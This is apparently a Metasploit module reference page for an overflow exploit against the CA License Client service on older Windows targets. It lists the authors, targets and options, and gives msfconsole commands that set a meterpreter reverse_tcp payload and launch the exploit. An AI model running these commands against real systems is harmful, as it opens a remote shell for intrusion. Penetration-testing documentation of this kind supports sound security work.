Browse Exploit & Auxiliary Modules

The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.

Search for modules

Open Source Vulnerability DataBase ID
Bugtraq ID
Full Text Search
Common Vulnerabilities Exposures ID
Microsoft Security Bulletin ID
 
Search Modules

Computer Associates License Client GETCONFIG Overflow

This module exploits an vulnerability in the CA License Client service. This exploit will only work if your IP address can be resolved from the target system point of view. This can be accomplished on a local network by running the 'nmbd' service that comes with Samba. If you are running this exploit from Windows and do not filter udp port 137, this should not be a problem (if the target is on the same network segment). Due to the bugginess of the software, you are only allowed one connection to the agent port before it starts ignoring you. If it wasn't for this issue, it would be possible to repeatedly exploit this bug.


Rank

  • Average

Authors

  • hdm < hdm [at] metasploit.com >
  • patrick < patrick [at] osisecurity.com.au >

References


Exploit Targets

  • 0 - Windows 2000 English
  • 1 - Windows XP English SP0-1
  • 2 - Windows XP English SP2
  • 3 - Windows 2003 English SP0

Development


Similar Modules


Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/license/calicclnt_getconfig
msf exploit(calicclnt_getconfig) > show payloads
msf exploit(calicclnt_getconfig) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(calicclnt_getconfig) > set LHOST [MY IP ADDRESS]
msf exploit(calicclnt_getconfig) > set RHOST [TARGET IP]
msf exploit(calicclnt_getconfig) > show targets
msf exploit(calicclnt_getconfig) > set TARGET [TARGET ID]
msf exploit(calicclnt_getconfig) > exploit


Module Options

RHOST The target address
RPORT The target port (default: 10203)
SRVPORT Fake CA License Server Port (default: 10202)
CHOST The local client address
CPORT The local client port
ConnectTimeout Maximum number of seconds to establish a TCP connection
ContextInformationFile The information file that contains context information
DisablePayloadHandler Disable the handler code for the selected payload
EnableContextEncoding Use transient context when encoding payloads
Proxies Use a proxy chain
SSL Negotiate SSL for outgoing connections
SSLVersion Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module
WfsDelay Additional delay when waiting for a session
TCP::max_send_size Maxiumum tcp segment size. (0 = disable)
TCP::send_delay Delays inserted before every send. (0 = disable)